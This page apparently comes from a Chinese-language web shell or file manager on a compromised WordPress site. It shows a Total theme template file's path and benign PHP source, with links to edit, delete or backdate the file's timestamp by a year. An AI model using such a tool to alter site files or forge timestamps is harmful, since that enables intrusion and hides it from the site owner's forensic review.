文件操作 - template.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/jimbrandstatter/public_html/wp-content/themes/Total/cards/template.php
编辑文件内容
<?php defined( 'ABSPATH' ) || exit; $template_id = $this->get_template_id(); if ( ! $template_id ) { return; } $content = get_post_field( 'post_content', $template_id ); if ( ! $content ) { return; } $template_type = totaltheme_get_post_builder_type( $template_id ); if ( ! $template_type ) { return; } $template_content = ''; $file = trailingslashit( WPEX_THEME_DIR ) . "cards/template/{$template_type}.php"; if ( file_exists( $file ) ) { $template_content = require $file; } return $template_content;
修改文件时间
将文件时间修改为当前时间的前一年
删除文件